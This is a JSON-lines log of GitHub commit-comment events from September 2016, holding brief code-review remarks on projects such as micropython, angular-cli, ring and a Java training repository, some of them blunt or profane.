{"id":"4514216437","type":"CommitCommentEvent","actor":{"login":"lucavictor220"},"repo":{"name":"dianaartiomlab/dianaartiomlab.github.io"},"payload":{"comment":{"id":18893974,"position":null,"line":null,"path":null,"commit_id":"c9b9ce0a1792de3d310c1d3ffeb330678d6dabda","created_at":"2016-09-04T18:58:37Z","updated_at":"2016-09-04T18:58:37Z","body":"I see so much experience through this awesome commit :smile: "}},"created_at":"2016-09-04T18:58:37Z"}
{"id":"4514218375","type":"CommitCommentEvent","actor":{"login":"deshipu"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893977,"position":14,"line":110,"path":"esp8266/modpybhspi.c","commit_id":"dba40afa706a1ac4b102dceba217844dc1540ce7","created_at":"2016-09-04T19:00:07Z","updated_at":"2016-09-04T19:00:07Z","body":"You asked for review. I did a review. You are welcome."}},"created_at":"2016-09-04T19:00:07Z"}
{"id":"4514218803","type":"CommitCommentEvent","actor":{"login":"pfalcon"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":18893978,"position":17,"line":200,"path":"docs/esp8266/quickref.rst","commit_id":"20da9064d7492b2f37a2140c17e468fb5785a593","created_at":"2016-09-04T19:00:18Z","updated_at":"2016-09-04T19:00:18Z","body":"I don't know why you think so, maybe because you didn't try other projects (various other projects). Anyway, if you compare your contribution chart https://github.com/deshipu and mine https://github.com/pfalcon , you may get idea I know about stress a bit more, and don't want to spend time on *stress*. So, feel free to submit patches (I thought you achieved that level when they come out naturally, based on the number you submit and which get merged lately), or suggestions are welcome too and will be acted on.\r\n"}},"created_at":"2016-09-04T19:00:18Z"}
{"id":"4514219102","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18893979,"position":null,"line":null,"path":null,"commit_id":"f286c1c798a1c9bbd46f8ea79282d3d2e76af30f","created_at":"2016-09-04T19:00:27Z","updated_at":"2016-09-04T19:00:27Z","body":"`npm i -g angular-cli@webpack`"}},"created_at":"2016-09-04T19:00:27Z"}
{"id":"4514219752","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18893980,"position":7,"line":50,"path":"band-web/pom.xml","commit_id":"2b8667d0f923973e9d3c2b5b224b386ab8def143","created_at":"2016-09-04T19:00:53Z","updated_at":"2016-09-04T19:00:53Z","body":"Use the version property declared in the parent POM."}},"created_at":"2016-09-04T19:00:53Z"}
{"id":"4514220725","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18893981,"position":22,"line":22,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/request/CreateBandMB.java","commit_id":"2b8667d0f923973e9d3c2b5b224b386ab8def143","created_at":"2016-09-04T19:01:38Z","updated_at":"2016-09-04T19:01:38Z","body":"Dependencies are `private`, yo."}},"created_at":"2016-09-04T19:01:38Z"}
{"id":"4514221091","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"Roboe/android_kernel_fairphone_fp2"},"payload":{"comment":{"id":18893982,"position":null,"line":null,"path":null,"commit_id":"f2a065870b15fab208a5b5e36272ea29b1d63712","created_at":"2016-09-04T19:01:53Z","updated_at":"2016-09-04T19:01:53Z","body":"Glad to help!"}},"created_at":"2016-09-04T19:01:53Z"}
{"id":"4514221824","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18893983,"position":null,"line":null,"path":null,"commit_id":"ca526000f65603557e98fd3b0dbd98e7ad964ac8","created_at":"2016-09-04T19:02:23Z","updated_at":"2016-09-04T19:02:23Z","body":"We might do this:\n\n1) (If we have pawns at all!) Pick the first (next) pawn (pop_lsb()?), create a \ngroup bitboard with it and increment pawnGroups\n2) Shift the group bitboard in the 8 directions. If ANDing the sum (OR) of the \nresults with ourPawns returns more pawns, include (|=) them in our group \nbitboard and repeat, otherwise go to (3)\n3) Loop through pawns of group bitboard like we do now with all the pawns etc.\n4) Remove the group from the pawns to evaluate\n5) If there are pawns left, go to (1), otherwise we're done.\n\nIs this correct?\n"}},"created_at":"2016-09-04T19:02:23Z"}
{"id":"4514222210","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18893984,"position":1,"line":1,"path":"band-web/src/main/webapp/META-INF/resources/css/theme.css","commit_id":"2b8667d0f923973e9d3c2b5b224b386ab8def143","created_at":"2016-09-04T19:02:42Z","updated_at":"2016-09-04T19:02:42Z","body":"Please include the Template project as a Maven dependency."}},"created_at":"2016-09-04T19:02:42Z"}
{"id":"4514223601","type":"CommitCommentEvent","actor":{"login":"mx3L"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18893987,"position":158,"line":207,"path":"src/serviceapp/serviceapp.cpp","commit_id":"761bb5f2048a2e983b7dc9fb1bc31de7e53471df","created_at":"2016-09-04T19:03:46Z","updated_at":"2016-09-04T19:03:46Z","body":"thanks done"}},"created_at":"2016-09-04T19:03:46Z"}
{"id":"4514224696","type":"CommitCommentEvent","actor":{"login":"aboe76"},"repo":{"name":"saltstack-formulas/postgres-formula"},"payload":{"comment":{"id":18893988,"position":63,"line":45,"path":"postgres/osmap.yaml","commit_id":"a6c4185b8512b99640dfafab5a35e6944cd7d612","created_at":"2016-09-04T19:04:33Z","updated_at":"2016-09-04T19:04:33Z","body":"To bad archlinux doesn't have osmajorrelease, it broke the formula on archlinux systems or systems without osmajorrelease grain."}},"created_at":"2016-09-04T19:04:33Z"}
{"id":"4514224790","type":"CommitCommentEvent","actor":{"login":"lukewendling"},"repo":{"name":"Sotera/watchman"},"payload":{"comment":{"id":18893989,"position":null,"line":null,"path":null,"commit_id":"d89dd563db93796a1e2774ff0bb0168c85a1f36e","created_at":"2016-09-04T19:04:39Z","updated_at":"2016-09-04T19:04:39Z","body":"@justinlueders removed clusters link for linkermonitors. we could conditionally add a link to /diagram here, when featurizer == 'linker'."}},"created_at":"2016-09-04T19:04:39Z"}
{"id":"4514226059","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18893990,"position":null,"line":null,"path":null,"commit_id":"ac47cbaff974a7ad51a9b93875e5c7a28c400556","created_at":"2016-09-04T19:05:38Z","updated_at":"2016-09-04T19:05:38Z","body":"Ok, but at least adding Xenial builds for both kernels for Pine64 should happen now that we got some attention with our build for that board especially since some/most users are plagued with GbE issues and the two tools users blindly trust in (iperf/iperf3) behave 'better' with Xenial. Any objections adding Xenial to Pine64?"}},"created_at":"2016-09-04T19:05:38Z"}
{"id":"4514227583","type":"CommitCommentEvent","actor":{"login":"iyerswatin"},"repo":{"name":"iyerswatin/SQL-Query-task3"},"payload":{"comment":{"id":18893995,"position":null,"line":null,"path":null,"commit_id":"afa70a637a402af6975c70d1eba5fcc4ab84eb5c","created_at":"2016-09-04T19:06:45Z","updated_at":"2016-09-04T19:06:45Z","body":"Write an SQL query that will return the following:\r\n\r\nAll individual contacts, with cases with a status of “ongoing”. Please also include their employer. We would like the result to be formatted as:\r\n\r\nContact display name, Employer organisation name, Number (count) of cases."}},"created_at":"2016-09-04T19:06:45Z"}
{"id":"4514229283","type":"CommitCommentEvent","actor":{"login":"lukewendling"},"repo":{"name":"Sotera/watchman"},"payload":{"comment":{"id":18894000,"position":null,"line":null,"path":null,"commit_id":"f859ebc51b2a2e46d581fa18987e78301bd6c436","created_at":"2016-09-04T19:08:01Z","updated_at":"2016-09-04T19:08:01Z","body":"@justinlueders propagate looPy errors back to UI so we don't have another wild goose chase."}},"created_at":"2016-09-04T19:08:01Z"}
{"id":"4514232343","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18894013,"position":8,"line":5,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/tree/ErrorCode.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-04T19:10:23Z","updated_at":"2016-09-04T19:10:23Z","body":"I think it's a hopeless cause @FroMage ;-)"}},"created_at":"2016-09-04T19:10:23Z"}
{"id":"4514232547","type":"CommitCommentEvent","actor":{"login":"millette"},"repo":{"name":"millette/feverish"},"payload":{"comment":{"id":18894014,"position":null,"line":null,"path":null,"commit_id":"a60c0d69183ad421202adf263e77df5e0fa1a1f5","created_at":"2016-09-04T19:10:31Z","updated_at":"2016-09-04T19:10:31Z","body":"ack!"}},"created_at":"2016-09-04T19:10:31Z"}
{"id":"4514232705","type":"CommitCommentEvent","actor":{"login":"Kroisse"},"repo":{"name":"rust-kr/rust-kr.org"},"payload":{"comment":{"id":18894015,"position":null,"line":null,"path":null,"commit_id":"236239e5e22b72eb7c75f49ef4b6bf733e29dbee","created_at":"2016-09-04T19:10:38Z","updated_at":"2016-09-04T19:10:38Z","body":"아 [IronError::new](http://ironframework.io/doc/iron/error/struct.IronError.html) 두 번째 인자가 `Response`가 아니라 `Modifier<Response>`군요. `Err(IronError { error: error, response: response.set(\"Not found\") })` 정도면 될 듯."}},"created_at":"2016-09-04T19:10:38Z"}
{"id":"4514233260","type":"CommitCommentEvent","actor":{"login":"millette"},"repo":{"name":"millette/feverish"},"payload":{"comment":{"id":18894017,"position":null,"line":null,"path":null,"commit_id":"f69da99e8545e3a8feac7fcb45ca634dfa144ddf","created_at":"2016-09-04T19:11:01Z","updated_at":"2016-09-04T19:11:01Z","body":"ack!"}},"created_at":"2016-09-04T19:11:01Z"}
{"id":"4514233867","type":"CommitCommentEvent","actor":{"login":"dfernandezm"},"repo":{"name":"GraffiTab/GraffiTab-Backend"},"payload":{"comment":{"id":18894020,"position":900,"line":18,"path":"src/main/resources/emailTemplates/feedback.htm","commit_id":"6bbaeccc5c875442f8c4fab0e9911db20851aa68","created_at":"2016-09-04T19:11:23Z","updated_at":"2016-09-04T19:11:23Z","body":"Missing color here :)"}},"created_at":"2016-09-04T19:11:23Z"}
{"id":"4514233963","type":"CommitCommentEvent","actor":{"login":"millette"},"repo":{"name":"millette/feverish"},"payload":{"comment":{"id":18894021,"position":null,"line":null,"path":null,"commit_id":"286803c41efdb59c922395a5746f5c8ebd6fa0dd","created_at":"2016-09-04T19:11:28Z","updated_at":"2016-09-04T19:11:28Z","body":"ack"}},"created_at":"2016-09-04T19:11:28Z"}
{"id":"4514234697","type":"CommitCommentEvent","actor":{"login":"loveGhb"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894023,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T19:11:55Z","updated_at":"2016-09-04T19:11:55Z","body":"Wow, did not expect to hear the answer :) \r\n\r\nI meant I do have Java 7 **ljacqu** correctly noticed. On the same machine I have old Minecraft server version 1.5.2. My concern is that if the switch to java 8 it will not work properly. It's probably a ridiculous fear, what do you say?"}},"created_at":"2016-09-04T19:11:55Z"}
{"id":"4514236411","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894024,"position":42,"line":42,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/dao/MySqlCarsDao.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:13:02Z","updated_at":"2016-09-04T19:13:02Z","body":"Лучше использовать try-with-resources. Везде кто открывается конекшин к БД"}},"created_at":"2016-09-04T19:13:02Z"}
{"id":"4514236745","type":"CommitCommentEvent","actor":{"login":"8masterofpuppets8"},"repo":{"name":"GraffiTab/GraffiTab-Backend"},"payload":{"comment":{"id":18894025,"position":900,"line":18,"path":"src/main/resources/emailTemplates/feedback.htm","commit_id":"6bbaeccc5c875442f8c4fab0e9911db20851aa68","created_at":"2016-09-04T19:13:13Z","updated_at":"2016-09-04T19:13:13Z","body":"Ignore these - this is from a SendGrid template so no need to review it - it generates the code itself so all good :)"}},"created_at":"2016-09-04T19:13:13Z"}
{"id":"4514238835","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894026,"position":125,"line":125,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/dao/MySqlCarsDao.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:14:38Z","updated_at":"2016-09-04T19:14:38Z","body":"Не выводи в стектрейс, а логируй "}},"created_at":"2016-09-04T19:14:38Z"}
{"id":"4514239116","type":"CommitCommentEvent","actor":{"login":"dkorolev"},"repo":{"name":"KnowSheet/CTFO_BE"},"payload":{"comment":{"id":18894027,"position":20,"line":119,"path":"crunchers/cruncher_active_users.h","commit_id":"87bfc4773057c0d820674180714e3422f60ea382","created_at":"2016-09-04T19:14:49Z","updated_at":"2016-09-04T19:14:49Z","body":"`self` is an almost-standard way for the \"copy\" of `this`."}},"created_at":"2016-09-04T19:14:49Z"}
{"id":"4514239859","type":"CommitCommentEvent","actor":{"login":"askovpen"},"repo":{"name":"davidakachaos/PokemonGo-Bot"},"payload":{"comment":{"id":18894029,"position":4,"line":363,"path":"pokemongo_bot/__init__.py","commit_id":"c361f58f51670b232899b767938234e65f42426c","created_at":"2016-09-04T19:15:17Z","updated_at":"2016-09-04T19:15:17Z","body":"incensed_pokemon_found?"}},"created_at":"2016-09-04T19:15:17Z"}
{"id":"4514242213","type":"CommitCommentEvent","actor":{"login":"millette"},"repo":{"name":"millette/feverish"},"payload":{"comment":{"id":18894031,"position":null,"line":null,"path":null,"commit_id":"9d80c517f78e5cd78af56b425eae83992057c2a1","created_at":"2016-09-04T19:17:07Z","updated_at":"2016-09-04T19:17:07Z","body":"ack"}},"created_at":"2016-09-04T19:17:07Z"}
{"id":"4514242304","type":"CommitCommentEvent","actor":{"login":"skddc"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18894032,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T19:17:10Z","updated_at":"2016-09-04T19:17:10Z","body":"I'm just saying the error message is misleading, because the content is incorrect. Using language that conveys that the resource can't be found or doesn't exist, as opposed to the endpoint being unreachable would fix it."}},"created_at":"2016-09-04T19:17:10Z"}
{"id":"4514242927","type":"CommitCommentEvent","actor":{"login":"Sturmrufer"},"repo":{"name":"BernardoGiordano/EventAssistant"},"payload":{"comment":{"id":18894033,"position":null,"line":null,"path":null,"commit_id":"dd71a21238a63979ac68622571e7fe80860f4fb5","created_at":"2016-09-04T19:17:33Z","updated_at":"2016-09-04T19:17:33Z","body":"Excellent! Keep up the good work, and I can't wait for for ESV's to be added along with egg support. "}},"created_at":"2016-09-04T19:17:33Z"}
{"id":"4514243088","type":"CommitCommentEvent","actor":{"login":"emmenko"},"repo":{"name":"sphereio/sphere-node-sdk"},"payload":{"comment":{"id":18894035,"position":null,"line":null,"path":null,"commit_id":"0a0d752c5c94b9f5dfcd8e64531c6640a6153d97","created_at":"2016-09-04T19:17:40Z","updated_at":"2016-09-04T19:17:40Z","body":"/cc @PhilippSpo @dferber90"}},"created_at":"2016-09-04T19:17:40Z"}
{"id":"4514243329","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894036,"position":25,"line":25,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/dao/MySqlUsersDao.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:17:48Z","updated_at":"2016-09-04T19:17:48Z","body":"нахуй пробелы"}},"created_at":"2016-09-04T19:17:48Z"}
{"id":"4514243371","type":"CommitCommentEvent","actor":{"login":"brocef"},"repo":{"name":"TuftsTusk/ringmaster"},"payload":{"comment":{"id":18894037,"position":5,"line":94,"path":"lib/route/listing.js","commit_id":"014fdff936ad302ee1e76c19998a246169f203d8","created_at":"2016-09-04T19:17:51Z","updated_at":"2016-09-04T19:17:51Z","body":"What did this change do?"}},"created_at":"2016-09-04T19:17:51Z"}
{"id":"4514244497","type":"CommitCommentEvent","actor":{"login":"dwesely"},"repo":{"name":"ozh/ascii-tables"},"payload":{"comment":{"id":18894039,"position":null,"line":null,"path":null,"commit_id":"b0de77ec1240afb04213178d3d084c6ebd57f229","created_at":"2016-09-04T19:18:43Z","updated_at":"2016-09-04T19:18:43Z","body":"This is still in reference to #20, but it still does not parse Wikimedia tables."}},"created_at":"2016-09-04T19:18:43Z"}
{"id":"4514245615","type":"CommitCommentEvent","actor":{"login":"skddc"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18894042,"position":22,"line":81,"path":"test/01-basics-suite.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-04T19:19:32Z","updated_at":"2016-09-04T19:19:32Z","body":"Isn't this testing something else then, i.e. a wrong/useless Webfinger response?"}},"created_at":"2016-09-04T19:19:32Z"}
{"id":"4514246168","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"LilyPad/Bukkit-Connect"},"payload":{"comment":{"id":18894044,"position":5,"line":72,"path":"src/main/java/lilypad/bukkit/connect/ConnectPlugin.java","commit_id":"833a94d9487f8c4de649a3dbbe133745252d4485","created_at":"2016-09-04T19:19:55Z","updated_at":"2016-09-04T19:19:55Z","body":"pretty sure I left that part in for 1.7 support in the future. tbh i don't think anybody cares about 1.7 though"}},"created_at":"2016-09-04T19:19:55Z"}
{"id":"4514248058","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18894045,"position":8,"line":5,"path":"typechecker/src/com/redhat/ceylon/compiler/typechecker/tree/ErrorCode.java","commit_id":"75db39f5996d73d721924ce30d1b72a99e205f67","created_at":"2016-09-04T19:21:13Z","updated_at":"2016-09-04T19:21:13Z","body":"What, inventing error codes out of thing air for errors that the IDE doesn't know anything about or have any sort of quick fixes for? Yes, for sure it is. Amazingly, creating an enum doesn't magic into existence new quick fixes.\r\n\r\nGive me a fucking break."}},"created_at":"2016-09-04T19:21:13Z"}
{"id":"4514248675","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894048,"position":21,"line":21,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/model/CarsServiceability.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:21:35Z","updated_at":"2016-09-04T19:21:35Z","body":"e плохое названия для переменной"}},"created_at":"2016-09-04T19:21:35Z"}
{"id":"4514249067","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894049,"position":21,"line":21,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/model/CarsType.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:21:56Z","updated_at":"2016-09-04T19:21:56Z","body":"e -плохо"}},"created_at":"2016-09-04T19:21:56Z"}
{"id":"4514251240","type":"CommitCommentEvent","actor":{"login":"djc"},"repo":{"name":"briansmith/ring"},"payload":{"comment":{"id":18894052,"position":7,"line":87,"path":"crypto/bn/convert.c","commit_id":"d77a17917fd3f1cd0b1e0077207f29d62e4fb864","created_at":"2016-09-04T19:23:40Z","updated_at":"2016-09-04T19:23:40Z","body":"Can you elaborate on why that is needed/useful? You seemed quite adamant that we be strict for `signature::primitive::verify_rsa()`."}},"created_at":"2016-09-04T19:23:40Z"}
{"id":"4514253915","type":"CommitCommentEvent","actor":{"login":"ZanderRak"},"repo":{"name":"SergShapoval/Autostation"},"payload":{"comment":{"id":18894054,"position":29,"line":29,"path":"Autostation/Autostation/src/ua/khpi/shapoval/autostation/service/MySqlRolesService.java","commit_id":"c7d11e66474bc308559285c8774c9515db08d734","created_at":"2016-09-04T19:25:41Z","updated_at":"2016-09-04T19:25:41Z","body":"Шо блять значит нул? "}},"created_at":"2016-09-04T19:25:41Z"}
{"id":"4514254617","type":"CommitCommentEvent","actor":{"login":"dr34mwh1t3"},"repo":{"name":"dr34mwh1t3/korova"},"payload":{"comment":{"id":18894056,"position":4,"line":4,"path":"korova.py","commit_id":"f7ea13449534886ac9f663bf05e6bb1d3bab8110","created_at":"2016-09-04T19:26:13Z","updated_at":"2016-09-04T19:26:13Z","body":"OK"}},"created_at":"2016-09-04T19:26:13Z"}
{"id":"4514255342","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18894058,"position":null,"line":null,"path":null,"commit_id":"4819d9ee00c67317f08fc6cf5798ed916b0ff7a1","created_at":"2016-09-04T19:26:45Z","updated_at":"2016-09-04T19:26:45Z","body":"@olesalscheider  Review, please. I think this makes sense, as we decided to drop Qt4 support in TpQt."}},"created_at":"2016-09-04T19:26:45Z"}
{"id":"4514256250","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18894059,"position":null,"line":null,"path":null,"commit_id":"95cea060b7f107571e7c86681862f0d855c7c2cf","created_at":"2016-09-04T19:27:25Z","updated_at":"2016-09-04T19:27:25Z","body":"There are still QLatin1String where it makes sense, e.g. in comparisons.\r\n\r\n@olesalscheider  Review, please."}},"created_at":"2016-09-04T19:27:25Z"}
{"id":"4514257577","type":"CommitCommentEvent","actor":{"login":"Terri5732"},"repo":{"name":"marcomzn/emjoidictionary"},"payload":{"comment":{"id":18894061,"position":null,"line":null,"path":null,"commit_id":"6f9c57f3135393ac040bc29c167d7cd6b598165e","created_at":"2016-09-04T19:28:30Z","updated_at":"2016-09-04T19:28:30Z","body":"Can I get a copy of the emoji cheat sheet/ dictionary? "}},"created_at":"2016-09-04T19:28:30Z"}
{"id":"4514258800","type":"CommitCommentEvent","actor":{"login":"Nikitaw99"},"repo":{"name":"mepalot64/pesterchum"},"payload":{"comment":{"id":18894063,"position":null,"line":null,"path":null,"commit_id":"e6db2f6197b50531d92d7d9aef782ca546cf29d2","created_at":"2016-09-04T19:29:33Z","updated_at":"2016-09-04T19:29:33Z","body":":+1: LGTM"}},"created_at":"2016-09-04T19:29:33Z"}
{"id":"4514259095","type":"CommitCommentEvent","actor":{"login":"Nuthen"},"repo":{"name":"camchenry/ludum-dare-36"},"payload":{"comment":{"id":18894064,"position":null,"line":null,"path":null,"commit_id":"6c9ab862d556c49dec26254d586cea13efa378c2","created_at":"2016-09-04T19:29:46Z","updated_at":"2016-09-04T19:29:46Z","body":"Looks good to me"}},"created_at":"2016-09-04T19:29:46Z"}
{"id":"4514260044","type":"CommitCommentEvent","actor":{"login":"LLNet"},"repo":{"name":"davidakachaos/PokemonGo-Bot"},"payload":{"comment":{"id":18894066,"position":21,"line":142,"path":"pokemongo_bot/cell_workers/catch_pokemon.py","commit_id":"c361f58f51670b232899b767938234e65f42426c","created_at":"2016-09-04T19:30:26Z","updated_at":"2016-09-04T19:30:26Z","body":"where are \"user_web_catchable\" defined ? \r\nuser_web_catchable = os.path.join(_base_dir, 'web', 'catchable-{}.json'.format(self.bot.config.username))\r\n\r\n?"}},"created_at":"2016-09-04T19:30:26Z"}
{"id":"4514261094","type":"CommitCommentEvent","actor":{"login":"pacahon"},"repo":{"name":"pacahon/datrie"},"payload":{"comment":{"id":18894069,"position":156,"line":955,"path":"src/datrie.pyx","commit_id":"e171708adf0f84065c120c451097af5fe034cf86","created_at":"2016-09-04T19:31:15Z","updated_at":"2016-09-04T19:31:15Z","body":"I lied. This version just fail-fast, while default impl honestly works through all elements before return False."}},"created_at":"2016-09-04T19:31:15Z"}
{"id":"4514262122","type":"CommitCommentEvent","actor":{"login":"iyerswatin"},"repo":{"name":"iyerswatin/SQL-Query-task3"},"payload":{"comment":{"id":18894071,"position":2,"line":1,"path":"README.md","commit_id":"1eb364ecf6493f3fadbfc24385eed5ea5fe9a712","created_at":"2016-09-04T19:32:07Z","updated_at":"2016-09-04T19:32:07Z","body":"FInal task"}},"created_at":"2016-09-04T19:32:07Z"}
{"id":"4514262593","type":"CommitCommentEvent","actor":{"login":"onlurking"},"repo":{"name":"ryukinix/dotfiles"},"payload":{"comment":{"id":18894072,"position":null,"line":null,"path":null,"commit_id":"128a08b1a8851c5a8fc8152a68c07bbd85443ccb","created_at":"2016-09-04T19:32:28Z","updated_at":"2016-09-04T19:32:28Z","body":"Sorry for that"}},"created_at":"2016-09-04T19:32:28Z"}
{"id":"4514264425","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18894075,"position":null,"line":null,"path":null,"commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-04T19:33:52Z","updated_at":"2016-09-04T19:33:52Z","body":"@olesalscheider  Review, please.\r\n\r\nI'm not sure how to process debug interface shutdown. Do we want to do it on ```QCoreApplication::aboutToQuit()``` signal or after app return:\r\n\r\n```diff\r\ndiff --git a/main.cc b/main.cc\r\nindex 434326e..85351c1 100644\r\n--- a/main.cc\r\n+++ b/main.cc\r\n@@ -41,5 +41,9 @@ int main(int argc, char *argv[])\r\n     cm->addProtocol(proto);\r\n     cm->registerObject();\r\n \r\n-    return app.exec();\r\n+    int result = app.exec();\r\n+\r\n+    disableDebugInterface();\r\n+\r\n+    return result;\r\n }\r\n```\r\n\r\nIn Morse I do not shutdown the iface at all, but I think it would makes valgrind to complain."}},"created_at":"2016-09-04T19:33:52Z"}
{"id":"4514265480","type":"CommitCommentEvent","actor":{"login":"briansmith"},"repo":{"name":"briansmith/ring"},"payload":{"comment":{"id":18894078,"position":7,"line":87,"path":"crypto/bn/convert.c","commit_id":"d77a17917fd3f1cd0b1e0077207f29d62e4fb864","created_at":"2016-09-04T19:34:41Z","updated_at":"2016-09-04T19:34:41Z","body":"See https://github.com/briansmith/ring/blob/7900e986f72741c3013c536c2d041fda099d565a/crypto/rsa/rsa_impl.c#L175-L187.\r\n\r\nRSA public key (n, e) shouldn't have leading zeros (IMO/AFAICT), but  we have to support leading zeros in the signature itself, because the signature length has to be equal to the modulus length and we use `GFp_BN_bin2bn` on the signature."}},"created_at":"2016-09-04T19:34:41Z"}
{"id":"4514266676","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18894082,"position":null,"line":null,"path":null,"commit_id":"ac47cbaff974a7ad51a9b93875e5c7a28c400556","created_at":"2016-09-04T19:35:32Z","updated_at":"2016-09-04T19:35:32Z","body":"No, none. Feel free to adjust those parameters ... I saw Trusty targets inside and that's why I started to change things in the first place. Perhaps we could add some H3 dev builds too?"}},"created_at":"2016-09-04T19:35:32Z"}
{"id":"4514270022","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18894086,"position":null,"line":null,"path":null,"commit_id":"bc9d67abbd7f2d42c028ead9f5a9d9ad73c31d85","created_at":"2016-09-04T19:38:01Z","updated_at":"2016-09-04T19:38:01Z","body":"Java 1.8 is able to handle 1.7 code without issues :)"}},"created_at":"2016-09-04T19:38:01Z"}
{"id":"4514270682","type":"CommitCommentEvent","actor":{"login":"kecnry"},"repo":{"name":"phoebe-project/phoebe2"},"payload":{"comment":{"id":18894087,"position":null,"line":null,"path":null,"commit_id":"fdc2772244a2c9b15d3b4143e6e7bdf33bbb441a","created_at":"2016-09-04T19:38:30Z","updated_at":"2016-09-04T19:38:30Z","body":"changes to frontend done in https://github.com/phoebe-project/phoebe2/commit/7c9f8a6f796857e31d013e7f92491f429a605f49"}},"created_at":"2016-09-04T19:38:30Z"}
{"id":"4514271297","type":"CommitCommentEvent","actor":{"login":"Tolo0"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18894088,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-04T19:38:58Z","updated_at":"2016-09-04T19:38:58Z","body":"Plugins (36): PlanB v1.3.0, BuyCraft v1.2.2, TimeCommander v2, EconomyAPI v2.0.9, WorldProtect v2.2.0dev1, iProtector v3.1a, IP-Protect v1.1, CombatLogger v1.2.0, 1vs1 v0.0.5, ItemCloud v1.3, PerWorldChat v1.3, RestartMe v1.2.0, PurePerms v1.2.2, FactionsPro v1.4.1, ChatDefender v1.1.1, LimitedCreative v1.0.0, ItemCasePE v1.0.8, EconomyShop v2.0.7, SimpleAuth v1.8.1, MagicWE v0.0.5, HelpModifier v1.0.0, CustomAlerts v1.6, VoteReward v2.1, EconomySell v2.0.7, TapToDo v2.2.1, EssentialsPE v1.1.3, ClearLagg v1.1.0, OnlyMyWay v1.0-release, InstantRespawn v0.5.3, ChatCensor v1.4, BasicHUD v1.0.6, ItemEffects v2.5.0, EconomyLand v2.0.9, SimpleAuthHelper v2.0.1, MyPlot v1, PureChat v1.4.0"}},"created_at":"2016-09-04T19:38:58Z"}
